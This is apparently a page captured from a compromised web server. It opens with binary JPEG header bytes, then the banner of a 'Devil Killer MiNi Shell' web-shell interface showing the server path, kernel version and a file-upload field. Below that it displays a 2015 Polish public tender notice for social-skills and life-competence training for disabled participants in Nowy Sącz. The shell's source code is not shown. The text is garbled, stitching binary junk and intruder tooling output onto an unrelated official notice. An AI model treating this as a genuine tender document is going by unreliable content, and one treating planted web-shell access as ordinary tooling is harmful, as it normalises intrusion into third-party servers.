JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150119/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150119/7505-N-2015.html

<p class="kh_header"><b>Nowy Sącz: Usługa w zakresie: Organizacja, obsługa techniczno-logistyczna i przeprowadzenie, w trybie grupowym, stacjonarnych zajęć treningu kompetencji i umiejętności społecznych, warsztatów,szkolenia uwierz w siebie oraz treningu kompetencji życiowych dla uczestników projektu pn. W stronę samodzielności 
i niezależności realizowanym przez Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 7505 - 2015; data zamieszczenia: 19.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Kilińskiego 72A, 33-300 Nowy Sącz, woj. małopolskie, tel. 0-18 4438251, faks 0-18 4442717.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa w zakresie: Organizacja, obsługa techniczno-logistyczna i przeprowadzenie, w trybie grupowym, stacjonarnych zajęć treningu kompetencji i umiejętności społecznych, warsztatów,szkolenia uwierz w siebie oraz treningu kompetencji życiowych dla uczestników projektu pn. W stronę samodzielności 
i niezależności realizowanym przez Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1: Stacjonarny trening kompetencji i umiejętności społecznych dla osób niepełnosprawnych. 
1.Liczba osób: 2.
2.Stopień niepełnosprawności: od lekkiego do znacznego; różne rodzaje niepełnosprawności, umożliwiające samodzielny udział w zajęciach. 
3.Program zajęć ma obejmować: 24 godziny lekcyjne (1godzina = 45 min.).
4.Miejsce realizacji: Nowy Sącz- wejście do budynku powinno być dostosowane do potrzeb osób niepełnosprawnych (wjazd dla wózków, winda); sala szkoleniowa powinna być dostosowana do potrzeb osób niepełnosprawnych, do wielkości grup - wyposażona w krzesła i stoliki z możliwością dowolnej aranżacji ich ustawienia, przystosowana do prowadzenia zajęć dydaktycznych; sala powinna być wyposażona w projektor multimedialny, ekran, flipchart (ewentualnie tablica sucho ścierna); sala szkoleniowa musi posiadać okna z dostatecznym naświetleniem naturalnym, posiadać oświetlenie sztuczne, spełniać wymogi bezpieczeństwa i higieny pracy oraz akustyczne, być ogrzewana, posiadać zaplecze sanitarne (toalety dostosowane do potrzeb osób niepełnosprawnych); sala powinna być wentylowana (z dostępem do świeżego powietrza), sala powinna zapewniać możliwość organizacji przerw kawowych. 
5.Termin realizacji: do 31 marca 2015 r. 
6.Zakres zadania: 
1.Założenia szkolenia:
celem szkolenia, jest budowanie i rozwijanie umiejętności interpersonalnych w życiu osobistym i zawodowym oraz dostarczenie wiedzy i umiejętności w zakresie m.inn.: komunikacji interpersonalnej, asertywności, powstawania i rozwiązywania konfliktów, radzenia sobie z trudnymi sytuacjami;
2.Zakres tematyczny szkolenia:
Blok 1 - Komunikacja interpersonalna 
a)Podstawowe informacje, cechy dobrej komunikacji, zakłócenia
b)Jak nawiązywać kontakt z drugą osobą?
c)Na co zwracać uwagę z drugim człowiekiem
d)Komunikacja w miejscach publicznych
e)Komunikacja w rodzinie
Blok 2 - Asertywność
a)Podstawowe informacje, najważniejsze elementy
b)Co pomaga a co przeszkadza być asertywnym
c)Praktyczne zajęcia asertywności
Blok 3 - Powstawanie i rozwiązywanie konfliktów
a)Podstawowe informacje, powody powstawania konfliktów
b)Skuteczne metody rozwiązywania konfliktów
c)Trening wyrażania negatywnych emocji
d)Praktyczne wykorzystanie wiedzy - inscenizacje i scenki
Blok 4 - Radzenie sobie z trudnymi sytuacjami
a)Podstawowe informacje
b)Jak skutecznie radzić sobie z trudnymi sytuacjami?
c)Konstruktywne krytykowanie
d)Trening wyrażania pozytywnych emocji
Blok 5 - Siła pozytywnego myślenia
a)Podstawowe informacje
b)Znaczenie i siła naszych słów i myśli
c)Siła pozytywów
d)Jak zmienić styl i sposób myślenia
3.Metody szkoleniowe: 
prezentacje, mini-wykłady, dyskusje, ćwiczenia indywidualne, ćwiczenia grupowe, symulacje, inscenizacje, odgrywanie ról.
WYMAGANIA OGÓLNE DO ZADANIA 1:
1.Wykonawca jest zobowiązany do zapewnienia min. 1 trenera do prowadzenia zajęć (posiadającego  wykształcenie, kwalifikacje i umiejętności związane z przedmiotem zamówienia z wykształceniem wyższym i uprawnieniami do prowadzenia poradnictwa psychologicznego.
2.Wykonawca zapewnia uczestnikom serwis kawowy z poczęstunkiem (drobne ciasteczka (typu Pieguski lub równoważne , paluszki, na jedno spotkanie), woda mineralna (0,5 l typu Piwniczanka lub równoważne; gazowana i niegazowana - 2 szt. na osobę), kawa (typu Nescafe lub równoważne - bez ograniczeń), herbata (typu Lipton lub równoważne - bez ograniczeń), cukier (wg. potrzeb), śmietanka do kawy (typu Łaciate lub równoważne - min. 2 szt.).
3.Zajęcia mogą odbywać się w dniach od poniedziałku do piątku oraz w weekendy, z zastrzeżeniem, iż dzienny wymiar zajęć, nie może przekroczyć 5 h (1godzina 45min.).  W trakcie realizacji zajęć dłuższych niż 2 godziny dydaktyczne Wykonawca zapewni po każdych 2 godzinach przerwę 15 minutową.
4.Wykonawca zapewni zwrot uczestnikom kosztów dojazdu z i do miejsca zamieszkania (Powiat Nowosądecki) na miejsce przeprowadzenie zajęć i z powrotem wg. poniższej tabeli:
L.p.Miejsce zamieszkania	Liczba osób
1.Łososina Dolna	1
2.Marcinkowice	1
5.Wykonawca zapewni zwrot kosztów dojazdu (wg powyższej tabeli) z miejsca zamieszkania (Powiat Nowosądecki) na miejsce przeprowadzenie kursu i z powrotem (w wysokości odpowiadającej cenie biletu) na podstawie: przedłożonego biletu bądź pisemnego oświadczenia uczestnika o korzystaniu ze środków transportu publicznego wraz z informacją od przewoźnika dot. cen biletów na danej trasie. W przypadku dojazdu uczestników samochodem prywatnym za kwalifikowane można uznać wydatki 
do wysokości nie wyższej niż cena najtańszego biletu na danej trasie, po przedstawieniu przez uczestnika stosownego oświadczenia o wykorzystaniu danego samochodu osobowego na potrzeby dojazdów w ramach uczestnictwa w projekcie oraz informacji uzyskanej od przewoźnika dotyczącej cen biletów na danej trasie. Nie ma konieczności przedstawiania paragonów lub faktur za zakup paliwa.
Zadanie 2: Stacjonarne warsztaty, szkolenie uwierz w siebie dla osób niepełnosprawnych.
1.Liczba osób: 17.
2.Stopień niepełnosprawności: od lekkiego do znacznego; różne rodzaje niepełnosprawności, umożliwiające samodzielny udział w zajęciach. Uwaga W przypadku jednej osoby niepełnosprawnej wymagany opiekun podczas trwania zajęć. 
3.Program zajęć ma obejmować: 18 godzin lekcyjnych (1godzina 45 min.).
4.Szkolenie obejmuje dwie grupy szkoleniowe: 1- dna  grupa 8-osobowa oraz 1 -dna grupa 9-osobowa, z tym zastrzeżeniem że grupy mogą być większe/mniejsze, nie więcej niż o 2 osoby.
5.Miejsce realizacji: Nowy Sącz- wejście do budynku powinno być dostosowane do potrzeb osób niepełnosprawnych (wjazd dla wózków, winda); sala szkoleniowa powinna być dostosowana do potrzeb osób niepełnosprawnych, do wielkości grup - wyposażona w krzesła i stoliki z możliwością dowolnej aranżacji ich ustawienia, przystosowana do prowadzenia zajęć dydaktycznych; sala powinna być wyposażona w projektor multimedialny, ekran, flipchart (ewentualnie tablica sucho ścierna); sala szkoleniowa musi posiadać okna z dostatecznym naświetleniem naturalnym, posiadać oświetlenie sztuczne, spełniać wymogi bezpieczeństwa i higieny pracy oraz akustyczne, być ogrzewana, posiadać zaplecze sanitarne (toalety dostosowane do potrzeb osób niepełnosprawnych); sala powinna być wentylowana (z dostępem do świeżego powietrza), sala powinna zapewniać możliwość organizacji przerw kawowych. 
6.Termin realizacji: do 31 marca 2015 r. 
7.Zakres zadania: 
Założenia szkolenia uwierz w siebie: 
m. inn. analiza mocnych i słabych stron, celów, pozytywnego myślenia, poczucia własnej wartości, autoprezentacja, kreowanie swojego wizerunku
1.Zakres tematyczny szkolenia:
Blok 1 - Mocne i słabe strony
a)podstawowe informacje
b)jak się postrzegam
c)jak mnie postrzegają
d)techniki wsparcia osobistego
Blok 2 - Cele życiowe
a)Wyznaczanie celów w ramach życia osobistego, pracy zawodowej, zapoznanie się 
ze specyfiką celów, korzyściami jakie niosą, warsztaty i ćwiczenia indywidualne pracy z własnymi celami
b)Moje wartości i zasady przyciągane i odpychane
c)Moje cele i wartości
Blok 3 - Pozytywne myślenie
a)Potęga myśli
b)Stres a pozytywne myślenie
c)Wizualizacja
Blok 4 - Poczucie własnej wartości
a)Podstawowe informacje
b)Filary poczucia własnej wartości
c)Ja w relacjach międzyludzkich
d)Autoprezentacja  
e)Skuteczna komunikacja
f)Kreowanie własnego wizerunku - mowa ciała, ruch, ubiór
2.Metody szkoleniowe: 
prezentacje, mini-wykłady, dyskusje, ćwiczenia indywidualne, ćwiczenia grupowe, symulacje, inscenizacje, odgrywanie ról.
WYMAGANIA OGÓLNE DO ZADANIA 2:
1.Wykonawca jest zobowiązany do zapewnienia min. 1 trenera do prowadzenia zajęć (posiadającego  wykształcenie, kwalifikacje i umiejętności związane z przedmiotem zamówienia z wykształceniem wyższym i uprawnieniami do prowadzenia poradnictwa psychologicznego.
2.Wykonawca zapewni min. 1 opiekuna dla osoby niepełnosprawnej podczas zajęć.
3.Wykonawca zapewnia uczestnikom serwis kawowy z poczęstunkiem (drobne ciasteczka (typu Pieguski lub równoważne , paluszki, na jedno spotkanie), woda mineralna (0,5 l typu Piwniczanka lub równoważne; gazowana i niegazowana - 2 szt. na osobę), kawa (typu Nescafe lub równoważne - bez ograniczeń), herbata (typu Lipton lub równoważne - bez ograniczeń), cukier (wg. potrzeb), śmietanka do kawy (typu Łaciate lub równoważne - min. 2 szt.).
4.Zajęcia mogą odbywać się w dniach od poniedziałku do piątku oraz w weekendy
z zastrzeżeniem iż dzienny wymiar zajęć, nie może przekroczyć 5 h (1godzina 45min.). W trakcie realizacji zajęć dłuższych niż 2 godziny dydaktyczne Wykonawca zapewni po każdych 2 godzinach przerwę 15 minutową.
5.Wykonawca zapewni zwrot uczestnikom kosztów dojazdu z i do miejsca zamieszkania (Powiat Nowosądecki) na miejsce przeprowadzenie zajęć i z powrotem wg. poniższej tabeli:
L.p.Miejsce zamieszkania	Liczba osób
1.Mogilno	1
3.Gaboń - Gołkowice	1 
4.Dąbrowa - Wielogłowy	1
5.Brzyna - Jazowsko	1
6.Berest	1
7.Sośnie Górne - Grybów	1
8.Czaczów - Łabowa	1
9.Muszyna	1
10.Marcinkowice	1
11.Popowice - Stary Sącz	1
12.Niskowa - Chełmiec	1
13.Marcinkowice - Chełmiec	1
14.Świnarsko - Chełmiec	1
15.Binczarowa - Florynka	1
16.Przysietnica - Barcice	1
17.Roztoka Brzeziny - Gródek nDunajcem	1
18.Oś. Biała Wyżna - Grybów	1
6.Wykonawca zapewni zwrot kosztów dojazdu (wg powyższej tabeli) z miejsca zamieszkania (Powiat Nowosądecki) na miejsce przeprowadzenie kursu i z powrotem (w wysokości odpowiadającej cenie biletu) na podstawie: przedłożonego biletu bądź pisemnego oświadczenia uczestnika o korzystaniu ze środków transportu publicznego wraz z informacją od przewoźnika dot. cen biletów na danej trasie. W przypadku dojazdu uczestników samochodem prywatnym za kwalifikowane można uznać wydatki do wysokości nie wyższej niż cena najtańszego biletu na danej trasie, po przedstawieniu przez uczestnika stosownego oświadczenia o wykorzystaniu danego samochodu osobowego na potrzeby dojazdów w ramach uczestnictwa w projekcie oraz informacji uzyskanej od przewoźnika dotyczącej cen biletów na danej trasie. Nie ma konieczności przedstawiania paragonów lub faktur za zakup paliwa.
Zadanie 3: Stacjonarny trening kompetencji życiowych dla osób niepełnosprawnych.
1.Liczba osób: 7.
2.Stopień niepełnosprawności: od lekkiego do znacznego; różne rodzaje niepełnosprawności; wymagany opiekun dla osób niepełnosprawnych, zarówno na trasie przejazdu jak i podczas trwania zajęć.
3.Program zajęć ma obejmować: 18 godzin lekcyjnych (1godzina = 45 min.).
4.Miejsce realizacji: Nowy Sącz- wejście do budynku powinno być dostosowane 
do potrzeb osób niepełnosprawnych (wjazd dla wózków, winda); sala szkoleniowa powinna być dostosowana do potrzeb osób niepełnosprawnych, do wielkości grup - wyposażona w krzesła i stoliki z możliwością dowolnej aranżacji ich ustawienia, przystosowana do prowadzenia zajęć dydaktycznych; sala powinna być wyposażona w projektor multimedialny, ekran, flipchart (ewentualnie tablica sucho ścierna); sala szkoleniowa musi posiadać okna z dostatecznym naświetleniem naturalnym, posiadać oświetlenie sztuczne, spełniać wymogi bezpieczeństwa i higieny pracy 
oraz akustyczne, być ogrzewana, posiadać zaplecze sanitarne (toalety dostosowane do potrzeb osób niepełnosprawnych); sala powinna być wentylowana (z dostępem 
do świeżego powietrza), sala powinna zapewniać możliwość organizacji przerw kawowych. 
5.Termin realizacji: do 31 marca 2015 r. 
6.Zakres zadania: 
A)Założenia treningu kompetencji życiowych: 
celem szkolenia jest m.in. przywrócenie uczestnikom samodzielności życiowej, skupienie uwagi na wadze zarządzania własnymi zasobami (np. czasem, budżetem), w realizacji wytyczonych sobie celów, udzielanie informacji o prawach i uprawnieniach.
B)Zakres tematyczny treningu:
Blok 1 - Kompetencje społeczne
- rozumienie sytuacji społecznych, 
- sposoby radzenia sobie ze stresem, 
Blok 2 - Podniesienie kompetencji osobistych
- gospodarowanie własnym czasem, 
- prowadzenie budżetu domowego, 
Blok 3 - Podniesienie kompetencji zawodowych
- wypełnianie podstawowych druków urzędowych i odpowiadanie na pisma urzędowe, 
- uzyskanie wiadomości dotyczących praw i uprawnień Uczestników Projektu.
C)Metody szkoleniowe: 
prezentacje, mini-wykłady, dyskusje, ćwiczenia indywidualne, ćwiczenia grupowe, symulacje, inscenizacje, odgrywanie ról.
WYMAGANIA OGÓLNE DO ZADANIA 3:
1. Wykonawca jest zobowiązany do zapewnienia min. 1 trenera do prowadzenia zajęć (posiadającego  wykształcenie, kwalifikacje i umiejętności związane z przedmiotem zamówienia z wykształceniem wyższym i uprawnieniami do prowadzenia poradnictwa psychologicznego.
2. Wykonawca jest zobowiązany do zapewnienia serwisu kawowego z poczęstunkiem (drobne ciasteczka (typu Pieguski lub równoważne, paluszki, na jedno spotkanie), woda mineralna (0,5 l typu Piwniczanka lub równoważne; gazowana i niegazowana - 2 szt. na osobę), kawa (typu Nescafe lub równoważne - bez ograniczeń), herbata (typu Lipton lub równoważne - bez ograniczeń), cukier (wg potrzeb), śmietanka do kawy (typu Łaciate lub równoważne- min. 2 szt.).
3. Wykonawca zapewni min. 1 opiekuna dla osób niepełnosprawnych zarówno na trasie przejazdu jak również podczas zajęć dla osób niepełnosprawnych.
4.Wykonawca zapewni transport uczestnikom oraz opiekunowi na trasie:Krynica Zdrój - miejsce odbywania zajęć i z powrotem (7 uczestników + 1 opiekun),
5. Zajęcia mogą odbywać się w dniach od poniedziałku do piątku w godzinach od 9.30 do 13.00, z zastrzeżeniem iż dzienny wymiar zajęć, nie może przekroczyć 3 h (1godzina 45min.). W trakcie realizacji zajęć dłuższych niż 2 godziny dydaktyczne Wykonawca zapewni po każdych 2 godzinach przerwę 15 minutową.
WYMAGANIA OGÓLNE DO WSZYSTKICH ZADAŃ:
1.Wykonawca jest zobowiązany do zapewnienia min. 1 trenera do prowadzenia zajęć (posiadającego  wykształcenie, kwalifikacje i umiejętności związane z przedmiotem zamówienia z wykształceniem wyższym i uprawnieniami do prowadzenia poradnictwa psychologicznego na grupę. Posiadającego doświadczenie w prowadzeniu szkoleń lub warsztatów lub treningów z obszaru pomocy i integracji społecznej w tym w zakresie treningów kompetencji społecznych lub psychospołecznych lub życiowych lub podstawowych dla osób niepełnosprawnych; do prowadzenia warsztatów i ćwiczeń w przedmiotowym zakresie. 
2.W przypadku zadania III Wykonawca zapewni opiekuna dla osób niepełnosprawnych, zarówno na czas przejazdu jak również na czas  trwania zajęć stacjonarnych, posiadającego doświadczenie w pracy z osobami niepełnosprawnymi.
3.Wykonawca zobowiązany jest dostarczyć harmonogram Zamawiającemu (do akceptacji i zatwierdzenia) w terminie 8 dni roboczych przed rozpoczęciem pierwszych zajęć.
4.Wykonawca zobowiązany jest do prowadzenia dokumentacji odrębnie dla każdego zadania (w tym również fotograficznej): dzienna lista obecności; dziennik zajęć zawierający listę obecności oraz wymiar godzin i tematy zajęć; lista osób, które rozpoczęły zajęcia; lista osób, które ukończyły zajęcia; lista osób, które nie ukończyły zajęć; rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie zajęć i uzyskanie umiejętności; kopie wydanych certyfikatów i zaświadczeń potwierdzających uczestnictwo w zajęciach; potwierdzenie transportu na zajęcia; potwierdzenie zwrotu kosztów dojazdu; lista obecności z potwierdzeniem korzystania z usługi cateringowej oraz odbiorem materiałów szkoleniowych; sprawozdanie merytoryczne z realizacji przedmiotu zamówienia, arkusze badań ewaluacyjnych i inne. Dokumenty powinny być opatrzone podpisem osoby prowadzącej oraz wykonawcy. Wzór w/w listy Zamawiający udostępni Wykonawcy przed rozpoczęciem zajęć. Wykonawca zobowiązany jest zapewnić bezpieczeństwo osób uczestniczących w szkoleniach, a także warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy.
5.Wykonawca zobowiązany jest załączyć do oferty: wstępne programy merytoryczne zajęć z uwzględnieniem czasu trwania sporządzone odrębnie dla każdego zadania do uzgodnienia i akceptacji zamawiającego przed podpisaniem umowy. Programy szkoleń muszą uwzględniać zakres merytoryczny poszczególnych szkoleń opisany w SIWZ .
6.Każdy uczestnik szkolenia musi mieć zapewnione materiały szkoleniowe zawierające ologowanie oraz informacje o współfinansowaniu zgodne z obowiązującymi wytycznymi Ministerstwa Rozwoju Regionalnego w zakresie Programu Operacyjnego Kapitał Ludzki (zamieszczonymi na stronie WWW.efs.gov.pl,zakładka Zasady promocji), uzgodnione pomiędzy Zamawiającym a Wykonawcą przed rozpoczęciem szkolenia, w tym zakresie tj. przybory piśmiennicze: komplet długopis i ołówek, co najmniej 60-kartkowy kartkowany notatnik w formacie A4, materiały dydaktyczne (np. kserokopie treści przekazywanych w trakcie zajęć, prezentacji multimedialnych), teczka-aktówka na materiały szkoleniowe, wielkość A-4. Materiały szkoleniowe należy rozdać uczestnikom szkolenia w pierwszym dniu treningu,warsztatu,szkolenia i przechodzą one na własność uczestników po zakończeniu treningu,warsztatu,szkolenia, potwierdzenie ich odbioru Wykonawca jest zobowiązany przekazać Zamawiającemu wraz z dokumentacją ze szkolenia.
7.W przypadku realizacji zadań wykonawca zapewni zwrot uczestnikom kosztów dojazdu (wg tabel) z miejsca zamieszkania (Powiat Nowosądecki) na miejsce przeprowadzenie szkolenia i z powrotem (w wysokości odpowiadającej cenie biletu) na podstawie: przedłożonego biletu bądź pisemnego oświadczenia uczestnika o korzystaniu ze środków transportu publicznego wraz z informacją od przewoźnika dot. cen biletów na danej trasie. W przypadku dojazdu uczestników samochodem prywatnym za kwalifikowane można uznać wydatki do wysokości nie wyższej niż cena najtańszego biletu na danej trasie, po przedstawieniu przez uczestnika stosownego oświadczenia o wykorzystaniu danego samochodu osobowego na potrzeby dojazdów w ramach uczestnictwa w projekcie oraz informacji uzyskanej od przewoźnika dotyczącej cen biletów na danej trasie. Nie ma konieczności przedstawiania paragonów lub faktur za zakup paliwa. 
8.Zajęcia mają się zakończyć badaniem ewaluacyjnym, przeprowadzonym w formie pisemnej, sprawdzającym nabycie, utrwalenie umiejętności społecznych oraz wzmocnienie kompetencji społecznych uczestników szkolenia.
9.Wykonawca zobowiązany jest zapewnić bezpieczeństwo osób uczestniczących 
w treningu,warsztatach,szkoleniach, a także warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy.
10.Zamawiający przekaże Wykonawcy imienną listę uczestników z danymi niezbędnymi do prawidłowego wykonania zamówienia przed rozpoczęciem realizacji usługi. 
11.Wykonawca zobowiązuje się udzielać na żądanie Zamawiającego informacji dotyczących stanu realizacji przedmiotu zamówienia (np. liczby osób uczestniczących w zajęciach itp.).
12.Wykonawca zobowiązany jest do przekazania uczestnikom zajęć informacji na temat współfinansowania przedmiotu zamówienia przez Unię Europejską ze środków Europejskiego Funduszu Społecznego i przekazać Zamawiającemu jedno pisemne oświadczenie w tej sprawie potwierdzającego wykonanie ww wymagania.
13.Wykonawca umożliwi pracownikom Zamawiającego przeprowadzenie kontroli prawidłowości realizacji usługi oraz podda się ewentualnej kontroli Instytucji Wdrażającej (Wojewódzki Urząd Pracy w Krakowie), a także udzieli stosownych wyjaśnień w obszarze związanym z przedmiotem zamówienia, na każde jego żądanie. 
14.Wykonawca przekaże Zamawiającemu oryginały z dokumentacji z zajęć w terminie 7 dni od zakończenia każdego z zadań. Dokumentacja zajęć powinna być oznakowana zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, zamieszczonymi na stronie internetowej: www.efs.gov.pl, zakładka - Zasady promocji.
15.Wykonawca zobowiązany jest do przeprowadzenia zajęć także w przypadku innej od wymienionej liczby osób w SIWZ. Zamawiający zastrzega sobie, w uzasadnionych przypadkach, prawo zmiany liczby uczestników zajęć. Zamawiający zapłaci Wykonawcy za faktyczną liczbę osób, które zakończą zajęcia na podstawie przekazanej dokumentacji zgodnie z pkt. 4. 
16.Wykonawca zobowiązany jest do sprawowania nadzoru nad frekwencją uczestników zajęć, a także bieżącego informowania osoby wyznaczonej po stronie Zamawiającego o każdej nieobecności osoby, która planowo powinna uczestniczyć w zajęciach.
17.Wykonawca wyznacza osobę do kontaktu (koordynator) - sprawującą nadzór nad realizacją przedmiotu zamówienia, odpowiedzialną za organizację i informowanie o planowanych zajęciach, ściśle współpracującą z osobą wyznaczoną po stronie Zamawiającego.
18.Wykonawca zobowiązany będzie do oznakowania miejsca zajęć oraz wszelkich dokumentów związanych z realizacją usługi zgodnie z Wytycznymi Ministerstwa Rozwoju Regionalnego dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki (zamieszczonymi na stronie www.efs.gov.pl, zakładka Zasady promocji). 
19.Wykonawca zobowiązany jest w ramach projektu (w okresie realizacji zawartej umowy) do zarejestrowania się w internetowej bazie ofert szkoleniowych dostępnej na stronie internetowej: www.inwestycjawkadry.pl i aktualizowania w tej bazie informacji o każdym prowadzonym szkoleniu w ramach nin. projektu (zawartej umowy) nie rzadziej niż raz w miesiącu oraz zobowiązany jest 
do przedkładania powyższych informacji Zamawiającemu z wykonania powyższego nałożonego obowiązku.
20.Wykonawca zobowiązany jest w ramach projektu (w okresie realizacji zawartej umowy) do zarejestrowania informacji o szkoleniu i terminach zajęć w internetowej bazie ofert szkoleniowych dostępnej na stronie internetowej: www.pociagdokariery.pl  i aktualizowania w tej bazie informacji o prowadzonym szkoleniu organizowanym w ramach nin. projektu (zawartej umowy) nie rzadziej 
niż raz w miesiącu oraz zobowiązany jest do przedkładania powyższych informacji Zamawiającemu z wykonania powyższego nałożonego obowiązku.
